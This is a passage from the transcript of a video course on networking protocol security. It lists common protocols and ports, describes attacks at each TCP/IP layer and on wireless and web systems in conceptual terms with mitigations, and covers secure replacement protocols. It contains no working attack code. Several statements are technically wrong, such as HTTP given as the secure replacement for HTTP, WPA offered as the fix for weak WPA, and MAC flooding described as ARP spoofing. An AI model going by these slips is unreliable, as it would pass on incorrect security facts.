HTTPS. [Video description begins] The information displayed on screen includes
the following: Use secure protocols for sending information. [Video description
ends]
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the importance of subnetting and how it
relates to security. We also covered VMs and containers. We did this by covering
concept of subnetting. We also looked at tips and tricks in subnetting. Then...Then
we also looked at planning for VMs and containers. And after this, we looked at
DNS configuration. And finally, we covered some common attacks on subnetting
and DNS.
In our next course, we will move on to explore the networking protocols and
importance of choosing an appropriate protocol. [Video description begins] The
following information is displayed on screen: Securing Networking
Protocols. [Video description ends]
Information Security: Securing Networking
Protocols
Learners can explore the key concept of the common protocols in use, and discover
the security issues of the transmission control protocol/Internet protocol (TCP/IP)
model and security protocols, in this 10-video course. You will begin by taking a
look at the common protocols used in a network, the ports they use, and the type
they are and what they do. Next, you will examine some of the security issues of
the TCP/IP model at the layer level, of which it has four: application, transport,
Internet, and data link. You will also explore the threats, vulnerabilities, and
mitigation techniques in network security; identify the types of weak protocols and
their replacements; and classify the various types of security protocols. Then
learners will continue by examining various ways to use security protocols in
different situations; the importance of implementing security protocols. In the final
tutorial, learners will explore the security-first mindset and its necessity.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh, an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT
infrastructure operations, software development, cyber security, and e-learning. In
the past, I worked under different capacities in the IT industry. I've worked as a
Quality Assurance Team Leader, Technical Specialist, IT Operations Manager, and
Delivery Head for Software Development. Along with this, I've also worked as
Cyber Security Consultant. I have a Bachelor's Degree in Psychology and Diploma
in System Management. My expertise are IT operations and process management. I
have various certifications which are, Certified Network Defender, Certified
Ethical Hacker, Computer Hacking Forensic Investigator. Other than these
certifications, I also have few certifications from Microsoft, which are MCSE,
MCSA and MCP. I'm also Certified Lotus Professional.
In this course, we will learn about the common networking protocols and their
security vulnerabilities. We will also focus about the risks around certain
networking protocols. Then, we will look at common security protocols and how
they are used on a network. Finally, we'll also learn about the security first mindset.
Common Protocols
[Video description begins] Topic title: Common Protocols. The presenter is Ashish
Chugh. [Video description ends]
When we talk about protocol, it is a method of doing something in a way which
two parties can understand. Similarly, in networking a protocol is a set of rules that
defines the communication between two or more devices. When you talk about a
protocol, it also defines the format of messages exchanged between two or more
devices. For example, let's talk about two human beings. One knows German, one
knows French. Now, they will not be able to communicate with each other unless
either both of them speak German or both of them speak French. Therefore, a
protocol works in the similar fashion on a network. Two devices that need to speak
to each other, they need to have a common protocol. Now this common protocol
could be anything. As long as both the devices are using the same one, they will be
able to communicate with each other. A protocol can be implemented either by a
software, or a hardware, or it could be implemented by both. It is not necessary that
only a software can implement a protocol. Even two hardware devices, when they
need to communicate, they need to have a common protocol being used.
[Video description begins] Common Protocols. [Video description ends]
So let's now look at some of the common protocols and the ports they use, and the
type they are, and what they do. So first one is File Transfer Protocol, which is
FTP.
[Video description begins] The type for File Transfer Protocol is TCP and the port
is 20/21. It is used for transferring files between a server and a client. [Video
description ends]
FTP is a very common protocol that is mostly used for uploading and downloading
files. So if you need to exchange files with multiple clients, you can simply put
together a FTP server and upload the files. Now, users who have either the user
credentials to access the FTP server, they can access those files. Or you could also
enable anonymous authentication, which means anybody knowing the IP address or
the FTP server name can connect to it and download the files. Then you have
something called Secure Shell, which is very commonly known as SSH. It is a TCP
type protocol. It works on port 22. And when you need to connect a remote session
with a system in a very secure way, which means that it needs to be encrypted, then
you can use SSH. Telnet, on the other hand, works in the similar fashion as SSH.
However, it does not create an encrypted session, all the information that travels on
the channels established by Telnet is in clear text format. Then we come to Simple
Mail Transfer Protocol, which is known as SMTP.
[Video description begins] The type for Telnet protocol is TCP and the port is 23. It
is used for establishing a remote connection to a device. [Video description ends]
It is a TCP type protocol, works on port 25, and it is mainly used for sending
emails. So when a client is sending an email, it is using SMTP. Then no network
can work without a DNS, unless or until they do not require name resolution. It is a
both TCP/UDP type protocol, it works on port 53, and mainly it is used for name
resolution. So for instance, if you type www.google.com, then there has to be a
mechanism which can translate this domain name into an IP address. That is the
role DNS plays. Then next comes the Dynamic Host Configuration Protocol, which
is the DHCP. It is a UDP type protocol, works on port 67/68. It uses both these
ports. One is for sending the request, another one is for receiving the IP address.
Then it is mainly used for distributing IP addresses on the network.
[Video description begins] The Dynamic Host Configuration Protocol is used for
leasing IP addresses to the clients on a network. [Video description ends]
Now you have to define a pool of IP addresses that can be leased out to the clients
on the network. Once the IP pool is exhausted, clients will not be able to obtain the
IP address. Therefore, whenever you create a DHCP server, you have to ensure that
there are enough IP addresses that can be leased out. Then comes the Trivial File
Transfer Protocol, which is known as TFTP. It is a UDP type protocol, works on
port 69. And it is mainly used for transferring files between two devices. And the
biggest thing about this protocol is you don't have to establish a session. So this is
commonly used with routers, switches where you have to upload a certain file
which could be their updates, or flash ROM file, or something like that. If you need
to upload it into routers and switches, you normally use TFTP.
Then comes the Hypertext Transfer Protocol, which is very commonly known as
HTTP. It is a TCP type protocol, works on port 80. And any time you would have
browsed a website, it is by default using a port 80. Unless you are using HTTPS,
which will use port 443. However, you do not have to suffix this particular port at
the end of the website name or the URL. Because the web browser, by default, if it
doesn't find a port number, it will assume that the request is being sent to port 80 if
HTTP is being used.
Post Office Protocol, which is known as POP. There have been many variants. The
current version is version 3, there was version 1 and 2 earlier. It is a TCP type and
works on port 110. It is mainly used for downloading emails from a messaging
server. But once it downloads the emails, it deletes it from the messaging server.
Then comes the Network Time Protocol, which is known as NTP. It is a UDP type
protocol, works on port 123. And it is mainly used by all devices on a network to
synchronize their time with the NTP server. Now NTP server, your organization
can set it up internally on their network, or it could be a NTP server somewhere on
the Internet. There are open NTP servers which are being used to synchronize time
with.
Let's now talk about Internet Message Access Protocol, which is known as IMAP.
It is a TCP type protocol, uses port 143. And it is also used to download emails
from a messaging server. Now the difference between POP3 and IMAP is where
POP3 deletes the mails or the emails from the messaging server, IMAP does not do
that. It will retain one copy on the messaging server but also download one copy on
the client desktop or laptop. Then you have Simple Network Management Protocol,
which is known as SNMP. This is a TCP/UDP type protocol. It uses port 161 and
162. It is mainly used for monitoring devices on the network. Then you have the
Border Gateway Protocol, known as BGP.
[Video description begins] The Simple Network Management Protocol is used for
monitoring, configuring, and controlling network devices. [Video description ends]
It's a TCP type protocol. It uses port 179. And BGP is mainly used for maintaining
the routing tables on the Internet. Finally, we come to Lightweight Directory
Access Protocol, very commonly known as LDAP. It is a TCP/UDP type protocol,
uses port 389. And it is a centralized repository to maintain information about
users, computers, groups, and various other types of information. Active Directory
is one of the most commonly known implementation of LDAP.
[Video description begins] The Lightweight Directory Access Protocol helps to
access and maintain distributed directory information. [Video description ends]
Security Issues of TCP/IP Model
[Video description begins] Topic title: Security Issues of TCP/IP Model. The
presenter is Ashish Chugh. [Video description ends]
Now, moving ahead, we will also look at the security issues of the TCP/IP model.
Now, this TCP/IP model has four TCP/IP layers, which are application, transport,
internet, and data link. Each layer has certain number of protocols that work on it.
So for instance, on application layer, you have various protocols, and it has the
maximum number of protocols running. So some of these protocols are like DNS,
DHCP, TFTP, FTP. Just a while back we did talk about most of these protocols.
Then we come to the transport layer which is the TCP and UDP protocols.
[Video description begins] Application layer includes the following protocols:
DNS, DHCP, TFTP, FTP, HTTP, IMAP4, POP3, SMTP, SNMP, SSH, Telnet,
TLS/SSL. [Video description ends]
Moving on to Internet, it has two versions of IP which work here, which is IPv4
and IPv6. Other than that, you have ICMP protocol which is mainly used with the
ping command. Then you have IGMP, and the data link layer has the ARP
protocol.
[Video description begins] Security Issues of TCP/IP Model - Application
Layer. [Video description ends]
Let's now look at some of the security issues with the protocols that exist on the
application layer. So when you talk about HTTP, you have various type of security
issues ranging from caching, replay attack, cookie poisoning, session hijacking,
cross-site scripting. Now, we are not going to get into detail of every type of
security issue, but we will talk about at least one or two of them. So let's talk about
session hijacking. It is also known as cookie hijacking. Which is the method of
exploiting a valid session to gain unauthorized access to information or service.
Then comes the cross site scripting, which is very commonly known as XSS. This
is the type of attack in which attacker injects malicious client side scripts into web
pages. So these client side scripts basically are intended to be downloaded onto the
user systems who have connected to that particular web page. When you come to
DNS, again, just like HTTP, there are various types of security issues. So talk about
DNS cache poisoning.
[Video description begins] The various types of security issues with DNS are as
follows: DNS Spoofing, DNS ID Hijacking, DNS Cache Poisoning, DNS Flood
Attack, and Distributed Reflection Denial of Service(DRDos). [Video description
ends]
It is also known as DNS spoofing, in which an attacker alters the DNS records to
divert Internet traffic from legitimate DNS servers to the malicious DNS servers.
And the problem with this type of attack is it can spread from DNS server to DNS
server. That is because when the zone information is being replicated between one
or more DNS servers, then this type of attack can spread. Because you end up
copying invalid cache to the other servers. Let's now talk about DNS flood attack,
which is a type of denial of service attack in which an attacker sends a lot of
request to the DNS server. Till the time DNS resources are consumed and DNS is
exhausted and cannot serve anymore. Moving on, let's talk about FTP. Now, FTP
has various types of attack, just like HTTP and DNS. One is FTP brute force attack,
in which the passwords of FTP servers are brute forced so they can be revealed, and
FTP servers can be accessed.
[Video description begins] The various types of security issues with FTP are as
follows: FTP Bounce Attack, FTP Brute Force Attack, Anonymous Authentication,
Directory Traversal Attack, and Dridex-based Malware Attack. [Video description
ends]
Then you have the directory traversal attack, in which an attacker gains access to
credentials. And accesses the restricted directories on the FTP server. Moving on,
when you talk about Telnet, there is a sniffing attack.
[Video description begins] The various types of security issues with Telnet are as
follows: Sniffing, Brute Force Attack, and Denial of Service(Dos). [Video
description ends]
Telnet sends the traffic in clear text format, which means it can be easily
intercepted, and it can be read out by the attacker. So this is the type of attack
which is known as sniffing. Then again, it is also prone to denial of service attack,
which is DoS. So that these are a couple of main security issues with the Telnet
protocol. Then if you look at DHCP, again, there are various types of security
issues with DHCP. So one is DHCP starvation.
[Video description begins] The various types of security issues with DHCP are as
follows: DHCP Spoofing, DHCP Starvation, Rogue DHCP Server. [Video
description ends]
An attacker sends lot of forged requests to the DHCP server to exhaust its IP pools.
So which means there are bogus or there are rogue request that are being sent to the
DHCP server. And DHCP server keeps on leasing the IP addresses till the time it
runs out of its IP addresses from its IP pool. Then comes the rogue DHCP server
attack, in which an attacker or a user on the network sets up a DHCP server which
starts to lease out IP addresses on the network. Now, there is already a legitimate
DHCP server which has leased out IP addresses. There is another rogue DHCP
server which has come up. So this rogue DHCP server will also start leasing out IP
addresses to the nearby clients and eventually it will start spreading. So therefore
the clients will start accepting the IP address from this particular DHCP pool.
[Video description begins] Security Issues of TCP/IP Model - Transport
Layer. [Video description ends]
When you talk about TCP, there is a SYN attack with which is a type of denial of
service attack.
[Video description begins] The various types of security issues with TCP are as
follows: SYN Attack, TCP Land Attack, TCP Sequence Number Prediction, IP Half
Scan Attack, and TCP Sequence Number Generation Attack . [Video description
ends]
An attacker sends a large number of SYN requests to a server. And the server
attempts to respond to every single request and therefore runs out of resources and
crashes or freezes. So that is the outcome of the SYN attack. Now when you talk
about TCP land attack, it is a layer for denial of service attack in which attacker
sends TCP SYN packets. Which are spoofed and have source and destination IPs to
be the same. So which means, now when the attacker sends out the TCP SYN
packets to a server, it appends the source and the destination address as the same.
When the server receives the request and attempts to respond, because the source
from where the packet came from is the same as where it was intended to be, it is
the same. The server eventually gets confused and starts consuming resources and
eventually crashes. When you talk about UDP, so there is a UDP flood.
[Video description begins] The various types of security issues with UDP are as
follows: UDP Flood, UDP Amplification, NTP Amplification, and Volume Based
Attack. [Video description ends]
It is a denial of service attack, in which an attacker sends UDP packet to a server.
And the result is same. The packets are sent in large quantity and eventually the
server gets exhausted from its resources and crashes or freezes. Then you have the
NTP amplification attack. It is a distributed denial of service in which attacker
exploits an NTP server with UDP packets.
[Video description begins] Security Issues of TCP/IP Model - Internet
Layer. [Video description ends]
Then we come to IP. When you talk about HTTP flooding, it is a distributed denial
of service attack in which an attacker sends out a large number of HTTP requests to
attack a web server or a web application.
[Video description begins] The various types of security issues with IP are as
follows: SYN Attack, HTTP Flooding, IP Spoofing, Brute Force Attack, and
Clickjacking. [Video description ends]
Eventually, either one of them which is being attacked attempts to respond to these
requests. And finally ends up exhausting the resources of the server and crashes.
Then you have Clickjacking attack. An attacker embeds a malicious link which is
sort of hidden on the webpage. So when the user clicks on the malicious link the
attacker can take control of their system. Moving on to ICMP.
[Video description begins] The various types of security issues with ICMP are as
follows: Fragile Attack, Smurf Attack, and ICMP Tunneling Attack. [Video
description ends]
There is a smurf attack which is a distributed denial of service attack in which the
attacker, using multiple or several hundred bots, sends ICMP packets using a
spoofed IP address. So which means you have no way of getting back to the
attacker or tracing the attacker because every request is coming from a spoofed IP
address. Then you have IGMP, which is prone to distributed denial of service,
DDoS, attack.
[Video description begins] The various types of security issues with IGMP are as
follows: Distributed Denial of Service(DDos) and Multicast Routing. [Video
description ends]
Now DDoS is something which uses hundreds or thousands or even millions of
bots which are known as zombie systems. And they attack a particular server. In
which the server, because it is receiving request from hundreds and thousands of
bots from the Internet, it cannot handle those requests and eventually crashes.
[Video description begins] Security Issues of TCP/IP Model - Data Link
Layer. [Video description ends]
Now, moving on to ARP. So when you talk about ARP, there is ARP spoofing, in
which the attacker sends large number of Ethernet frames with fake MAC
addresses to a switch.
[Video description begins] The various types of security issues with ARP are as
follows: Connection Resetting, Man in the Middle (MITM), Packet Sniffing, Denial
of Service (DoS), ARP Cache Poisoning, MAC Address Flooding, and ARP
Spoofing. [Video description ends]
And eventually fills it up with the spoofed ARP addresses, and then switch is not
able to cater to the legitimate requests.
Threats, Vulnerabilities, and Mitigation
[Video description begins] Topic title: Threats, Vulnerabilities, and Mitigation. The
presenter is Ashish Chugh. Threats and Mitigation - Wireless. [Video description
ends]
So not only the wired networks have threats and they have security issues, but it is
the wireless network which is also prone to multiple types of threats. And of course
then there are various types of mitigation methods that can be used. So let's now
look at some of these threats and how they can be mitigated. So first one is war
driving. So in this type of attack, you simply roam around in a car across the streets
and in the market and try to find an open wireless network that you can connect to.
So the mitigation method could be simply decrease the wireless range and hide the
SSID. Now, there is no guarantee hiding the SSID would work because there are
tools which can discover even the hidden SSIDs. But it can still work as a
mitigation method. Then you talk about war chalking. In this type of threat,
basically the attacker marks the area after SSID and its credentials are known. So
once the attacker has discovered, not only the SSID, but also the credentials,
basically the walls of that particular building are marked. So the attacker knows
this is where I've discovered a wireless network, and I know the credentials.
Mitigation method is the credentials were discovered because you were using a
weak security protocols like WEP. So you have to use WPA2.
You can also enable MAC filtering. Now when you enable MAC filtering, it is a
simple thing. Only the MAC addresses that are embedded or that are added into the
wireless access point, they'll be able to connect to the wireless network. Then you
have to also disable SSID or hide the SSID. Moving on, WEP/WPA cracking, now
these both were weak security protocols. In fact, lot of wireless routers now don't
even support WEP. They support WPA and onwards, which is WPA2 and various
other protocols. But now when you talk about cracking WEP or WPA, you are
basically scanning and determining the pre-shared key. Which is nothing but the
password that has been set for the wireless network. To mitigate this, you have to
use strong encryption protocol such as WPA. And of course, along with that you
can also use complex passwords so they are not easy to determine, or they are not
easy to crack. When you talk about evil twin, you just simply set up a rogue access
point for the legitimate users.
[Video description begins] For Evil Twin you set up a rogue AP for the legitimate
users to sniff the data. [Video description ends]
Now, what happens is when users find another wireless access point to which they
had been connecting, now when the users find another access point with the same
name, they're likely to get confused which is the legitimate one. So some people
will simply try the evil twin access point. And once they connect, they will provide
the username and password. And there you go, you are able to capture their
credential. How do you protect this, or how do you mitigate this threat? You simply
implement something known as Wireless Intrusion Prevention System, which is
WIPS. Then comes the rogue access point. This is an access point which is
installed without the knowledge of the IT team. Now anybody could simply bring a
wireless access point, connect it to the Ethernet network or the wired network, and
it will start broadcasting its SSID. It's as simple as that. There are ways to mitigate
that, something like enable switch port tracing. Or you could also do mode
scanning. Or you can also implement a application which is known as the rogue
detector. You can use different methods to detect a rogue access point.
Now let's look at some of the threats and mitigation methods of a network which is
a wired network. So first one is ICMP flood. In ICMP flood an attacker sends a
large number of ICMP packets to a system or a server. Which means the server or
the system is receiving so many ICMP packets in a continuation that it is unable to
respond to each and every packet. Now system attempts to do that, but as a
consequence it starts to exhaust its resources. Therefore, it is unable to handle all
the request and eventually crashes. So how do you mitigate this threat? You simply
enable the firewall to block ICMP packets on the server or the device. Then there is
a denial of service and distributed denial of service type of threats. Now denial of
service is from one system to another system.
[Video description begins] DoS/DDos threat puts a system or network to a halt
after saturating its resources. [Video description ends]
But when you talk about distributed denial of service, it has hundreds or maybe
thousands of systems focusing on one single server or a system, and sending lot of
packets at the same time. Now because when you talk about one-to-one, there is
only limited number of packets that will come. But when you talk about distributed
denial of service, then there are thousands of nodes sending the request to a single
node. Which means the power of that particular attack has multiplied by few
thousand times. And the server is unable to take that much load, and eventually
crashes. So how do you mitigate this? First, you baseline your network traffic. You
see what is the normal traffic pattern and keep monitoring your network traffic to
ensure that this pattern is not deviated from. And if there is a deviation which is
alarming, then you know there is something that is not right.
You can also compare signatures of the incoming traffic. So there are applications
and there are hardware devices which can help you map the signature of the
incoming traffic. And once you know if it is not a common signature, it is
unidentified signature, that means there is something wrong. So you can block that
traffic. And now there are anti-DoS and anti-DDoS devices that are available in the
market which are designed to protect your network or servers from these type of
threats. Then you can buy that device, implement it on the network, and you will be
able to protect your network or the server. Then comes the Fraggle threat in which
attacker sends spoofed UDP packets to a specific broadcast address of a system, or
a server, or a device. Now how do you mitigate this threat?
You simply disable the IP broadcast on the network and also enable the firewall to
block ICMP packets. Then there is buffer overflow, in which there is a malicious
code in an application which puts more data in the buffer that it can handle. So
when the buffer is filled, it is not able to cater to any of the requests on the system,
and eventually it causes the application to crash. So how do you mitigate that? You
have to detect vulnerabilities in the code. Because if there is a vulnerability in the
code, an attacker could have embedded something in the code which would have
caused the buffer overflow. Now let's look at the threats and mitigation methods of
web applications. So first one is injection.
Now in this, an attacker injects malicious code or a script into the web application's
code. And this is because the web applications have vulnerabilities, and they are
not sanitized, or the data being input is not validated properly. So the attacker can
simply embed some data into a field and inject something that is not safe for the
web application. Now when malicious code or script is embedded into the web
application, it can trigger lot of unexpected actions which the application is not
designed to handle. So you have to perform server-side validation in which any
data that is being triggered from the web application and going to the backend, it
must be checked through server-side validation. And also when a user is inputting
something into a field, you have to validate that and then sanitize if required. So for
instance, when you talk about validation, now if there is a telephone field where
you are expected the user to input a telephone number.
Now this particular field should not take any characters, it should only take
numbers. So if user is typing any other character other than number, that means the
input has not been validated. If it was being validated, then it would have prompted
the user with a message something like, this is not the correct input. You have to
input numbers only. And then there could be sanitization of the input data. For
instance, if you are expecting the user to put everything in capital letters, and the
user input something in the lowercase letter. Then you can sanitize that and convert
the lowercase into uppercase. This is just one example, there could be many other
things that can be sanitized.
Let's talk about broken authentication. This is basically when an attacker brute
forces an application or brute forces a web page to gain access to the user
credentials. Now in this, basically passwords are the output of these attacks. When
the passwords are gain, then the attacker is able to use these passwords and the user
credentials to get into the application. How do you mitigate that? You can
implement multi-factor authentication. Which means not only the user has to
provide the password, but you could also send one-time password to the user. So
which means along with this permanent password, there is a one time password
which has a maybe 15 minutes validity.
The user has to provide the OTP also, along with the password. Unless both these
things match from the backend, the user is not granted the access to the application.
And of course, other than just simply implementing the password, you have to
ensure that you implement complex passwords. User should not be using simple
passwords, such as password12345, something like that. So you have to make sure
that users are forced to use complex passwords. So you can always put a password
policy on the domain controller. Or using your LDAP directory, you can implement
password policies. And once the password policies are implemented, then users
will be forced to use complex passwords.
Now let's move on to sensitive data exposure. This is when either the encryption
keys are stolen, which means your private key is compromised. Or there is a manin-the-middle attack that happened in a transmission of information which was
being done in cleartext format. So these are just two examples how sensitive data
can be exposed but there are various other ways. For instance, giving incorrect
access to somebody who doesn't need that particular access on a web server or a
file server. How do you mitigate this kind of threat? So you avoid storing sensitive
data. So you should avoid storing sensitive data. This means your sensitive data
should not be lying around on some file server or a web server out in open. It has to
be secured. It has to be. If it does not require regular access, then you should back it
up and store it in a safe area. And if it requires regular access only by a few
individuals, then ensure that only those individuals have appropriate access.
When you are sending data from one end to the other end, which means sending
one device to the other device, specially on the Internet, you need to make sure that
you encrypt your data. Sending data in cleartext can be easily intercepted by any
third party who's watching over you. Then disable caching because caching can
also store large amount of data. And if somebody gets hands on the caching of a
particular web server or a particular server, then that person is able to not only
retrieve data, it is also possible to retrieve user credentials from caching. Now when
you talk about security misconfigurations, this is one of the most common mistakes
made by the web server administrators. Where they tend to not only give out access
to individuals who don't require it, but also they add services which are not
supposed to be running on that particular web server.
For instance, if you have no use of FTP, then the administrator would simply
configure FTP as well along with the HTTP. So that is not required. Why would
you want to configure FTP if it is not required? Because even though there is no
data on it, but that particular service can be exploited. So in brief, when you talk
about security misconfiguration, this type of attack is mainly on the user accounts.
Which means they could be using the default accounts that exist on a system. Or it
is the default configuration. For instance, you have just implemented the web
server. It has lot of services running which you don't require. So if you don't
require, the best thing is to shut them down. And of course, it is not only the web
server which can cause this kind of threat. You have to ensure the operating system
on which the web server is running is hardened. And it also does not run
unnecessary services. It does not have open ports which are not required. So this
type of mitigation has to come from the bottom up. So first you have to ensure that
your operating system is secured. Then you have to ensure that your web server is
secured. Then you have to move on to the web application which is being hosted.
You have to ensure that is also secured. So all three components must be secured.
Weak Protocols and Their Replacements
[Video description begins] Topic title: Weak Protocols and Their Replacements.
The presenter is Ashish Chugh. [Video description ends]
Let's now look at some of the weak networking protocols and their replacements.
So first one is Telnet, a little while back we discussed Telnet is a protocol that
establishes a session with a remote host but sends the information in cleartext
format. Therefore, anybody can intercept the information, and its replacement
protocol is SSH which creates a encrypted tunnel and encrypts the information
being sent from one host to the other host. Then comes the rsh, which is prone to
eavesdropping and credential stealing attacks. Again, the replacement for this
protocol is SSH.
Moving on to rcp, which was used for copying files from one host to another host.
So one is your system, let's say, and another one is the remote host, you would use
rcp command to copy files from and to the server. Now this, again, had the same
problem because the information was being sent in cleartext. Now SSH is, again,
the replacement for this. Then comes the rlogin protocol which is mainly used on
UNIX and it works in the similar fashion as Telnet. Both had the same problem
which was sending the information in cleartext, therefore SSH comes in as a
replacement. Finally, you come to FTP, which is File Transfer Protocol. A little
while back, we discussed FTP is prone to different type of security issues which are
like FTP brute force attack, or anonymous authentication, directory traversal attack.
So therefore, FTP is not a safe protocol to use when you're sending information
which is confidential and sensitive over the Internet.
The best is to use secure FTP which encrypts the information and now it's a bundle
of FTP plus TLS. Then we come to HTTP. Now HTTP is good for static sites
which do not have to manipulate data or does not use dynamic data generation. So
for instance if you're doing search, then it is not going back to the database and
fetching information. Now if you are using HTTP with any site that handles
monetary transactions or it handles data which has to be queried from, then it is a
wrong protocol to be used because it sends the information in cleartext format
which can be easily intercepted.
To give you an example, if you have hosted a website which contains a login page.
Now this website is hosted using HTTP protocol. When you enter the username
and password, somebody sitting on your network or somebody who can access
your transmission can easily use a tool like Wireshark to intercept the data and
figure out the username and password. Because it will be captured in the exact
same manner like you have logged in to the website. So example, your username is
admin, password is password.
The Wireshark application will be able to capture this information, and the attacker
will be able to easily guess what your user credentials are. So as a replacement you
can use HTTP, which is HTTP plus TLS, transport layer security protocol. So now,
when you use the same application with HTTPS, the information is encrypted and
therefore is not visible when somebody intercepts the data flowing out from the
web application. SNMP was known for many vulnerabilities.
Now most of the vulnerabilities have been covered in the latest version, which is
SNMPv3. There are more enhancements that are happening to this particular
protocol but SNMP3 is the most widely used. Then you come to IMAP. So there is
now a new version which is IMAP over SSL and TLS. So SSL is also not being
used, it's been broken multiple times, so best is to use IMAP over TLS. Similarly to
that, POP3 you also can use with TLS and SSL. As I just said, SSL has been
broken many times which means people have been able to break it and capture data
from the transmission which was using SSL. Now the best thing to do is use TLS.
Types of Security Protocols
[Video description begins] Topic title: Types of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at various types of security protocols. Before we do that, let's look
at various features of the security protocols. So, first of all, any security protocol
that you talk about, it does not work on its own. So it has to work with the
underlying protocol. So take an example of HTTPS. Now, HTTPS does not work
on its own. It has to use HTTP as the underlying protocol. Then if you talk about
FTPS or SFTP, FTP is the underlying protocol. So therefore, so there has to be a
protocol with which the security protocol is bundled. Then the one of the main
reason for using a security protocol is to ensure the data is protected. And that is
done by ensuring the security protocol is able to ensure the integrity and the
confidentiality of the data.
Depending on which one you use, it can either do both, or it might just do one of
these things, which is either integrity or confidentiality. However, it depends on the
type of security protocol you use. And in many cases, it can also secure the delivery
of information. Which means if you take a protocol like IPSec or SSH, it encrypts
the information before sending it to the recipient. So therefore the information is
secured. And of course, not all security protocols same in nature, some are used
with the messaging, some are used with the web application, some are used
between host-to-host communication. So you will look at some of these going
ahead. So the first one to look at is IPSec, which is IP security. It encrypts the
communication between two hosts to ensure integrity and confidentiality. Then you
talk about transport layer security, which is TLS. It is mainly used with web
applications to ensure data is encrypted between the web server and the client.
OpenPGP, it is one of the standards for email encryption. It ensures privacy and
integrity of the messages. When you talk about secure socket shell, which is SSH,
we talked awhile back about SSH, it creates an encrypted channel between your
system and the remote host to which you want to connect. And then it allows you to
send information. Now since the channel is encrypted, it is not possible to intercept
that particular channel via man-in-the-middle. Anybody else cannot sniff that
traffic. Then you have secure multipurpose Internet mail extensions, known as
S/MIME, which uses public key encryption and signs the MIME data. It is mainly
used for encrypting emails. Then we have domain name system security extensions,
commonly known as DNSSEC, which is used to protect cache resolvers and stops
the manipulation of DNS data from cache poisoning. Then we move on to secure
real-time transport protocol, which is known as SRTP. It is used for packet
encryption and also prevents from the replay attack. Moving on, then we have
network time protocol secure, which is known as NTPSec. Now, it is a securityhardened implementation of NTP. Then we have File Transfer Protocol secure,
which is known as FTPS. It is also known as FTP Secure, and it basically adds or
bundles up TLS with FTP.
Uses of Security Protocols
[Video description begins] Topic title: Uses of Security Protocols. The presenter is
Ashish Chugh. [Video description ends]
Let's now look at some of the uses of security protocols. Now, in totality, if you
look at most of these security protocols are designed to protect the information in
whichever way possible. So they could be protecting the integrity, or the
confidentiality, or they could be encrypting the information to protect the data that
is in transit or data at rest. It depends which security protocol you are using and
how you're using it. So now one of the biggest use is that when you are sending
information over the Internet specifically, then you have to ensure that the
information must be encrypted. So you can use a security protocol to ensure this.
And, of course, along with that, when the data is at rest, which means it is in
storage on a server, then the data has to be encrypted. So information or the data at
any cost needs to be protected and that is where the security protocols come in. So
you have to encrypt the information, whether it is being at rest or it is being in
transit, it has to be encrypted. And the only reason you would want to encrypt the
information is because you want to ensure the integrity and the confidentiality of
the data.
You do not want anybody who does not have access to access that information.
And security protocols also help you secure application level data transport. Which
means if the data is flowing out of the application, then it needs to be secure. So
you have to build mechanism like TLS within the application to ensure the data is
encrypted. It also helps you perform entity authentication. So anybody who's
connecting or attempting to connect to a particular host or a server, that can be
authenticated with the help of a security protocol. And, of course, because if your
data is encrypted, if your data is secured, then you can prevent unauthorized access
to the data. So some of these examples of security protocols are Secure File
Transfer, which is SFTP, Secure Hypertext Transfer Protocol, which is HTTPS,
and Secure Socket Layer, which is SSL.
Importance of Security Protocols
[Video description begins] Topic title: Importance of Security Protocols. The
presenter is Ashish Chugh. [Video description ends]
Let's now learn about the importance of security protocols. So security protocols
help you prevent the loss of data integrity. Now if you take the example of
OpenPGP or S/MIME which help you encrypt the emails. Now imagine if these
emails were carrying confidential data and they were in transit. They could have
been sniffed by anybody who's got access to the network or if these emails were
flowing over the Internet and they were not encrypted. Think about it, you could
lose all your confidential and sensitive data. Therefore, with the help of the security
protocols, you can prevent the loss of data integrity.
Similarly, now if you're using the security protocol to ensure the data is secure you
are allowing only the limited number of users who have access to that particular
data to access it. Which means if you do not have access to that particular folder on
a network, then the user will not be able to access it. Because you could simply
encrypt the data and allow access only to few individuals.
Now if those users who do not have access to this, they will not be able to see. A
simple example could be you encrypt your own laptop using BitLocker. Now when
you encrypt it, unless or until you know the password and you have the private key
of the encryption, nobody else can access that data. It is only you who's preventing
the data, not only the confidentiality, but also the integrity. And because you are
able to protect the data integrity and confidentiality, you're also protecting data
breaches and thefts.
Let's assume your system is encrypted, your laptop is encrypted. Now if somebody
steals your laptop, what happens? It is gone with all the information you have, but
you need not worry because information is encrypted. It probably won't be possible
for that person to break that encryption and recover the data. And of course, with
the use of TLS in web applications, you can prevent attacks like man-in-the-middle
and sniffing. When you're using HTTP and somebody enters the user credentials in
the login page, anybody can sniff that. And if you're making a transaction while the
web application is still on HTTP, anybody can perform the MITM attack, which is
man-in-the-middle. Now if you've used HTTPS, both these types of attacks can be
prevented.
Now when you're talking about data at rest, it is the data in storage when it is in
transit. Which means the data is going from your system or one system to the
remote host, it could be on the Internet, it could be on the intranet. You need not
worry as much when the data is in transit on the intranet, but on the Internet, you
definitely do not want to send information in clear text. And if you are doing that,
you are just inviting trouble. Therefore, it is always best to use a security protocol
to encrypt that information and send it. For instance, you can use SSH to create an
encrypted channel and send the data. And you can also secure communication
between two devices using SSH. Or you could also use IPsec to create encrypted
tunnels between two hosts, one could be yours and one could be the remote host.
The Security-First Mindset
[Video description begins] Topic title: The Security-First Mindset. The presenter is
Ashish Chugh. [Video description ends]
Little earlier, we talked about security protocols, we talked about, why should they
be used, what are their features, what are their benefits? Now, before we even get to
the security protocols and their implementations, we need to have something called
security first mindset. Now, what is this security first mindset all about? One, it
unifies security and compliance. Which means not only helps you implement
security, but it also ensures your devices, and your network, and your infrastructure
is compliant to that particular security that you had implemented. For instance, you
might be pursuing for PCI DSS certification, which is a compliance framework.
Now, if you do not implement enough security and ensure that your devices and
your infrastructure is compliant, you'll never get that certification or you will never
be able to comply with PCI DSS. Therefore, you have to ensure both security and
compliance are unified. Now, when you talk about security first mindset, it also
strengthens the security posture. Because if you're not talking about security, if you
are not thinking about security in your organization, then there is no way security
will become the most critical point of your organization. Now, if that is not there,
then of course, the security posture will be missing because security would be one
of those things that you have to do it. And that is not what security first mindset is
all about. It encourages everyone to play key role. So everybody, right from the
senior management to the last employee in the hierarchy, everybody has to think
from security perspective.
The role they are playing in their organization will vary. Therefore, the
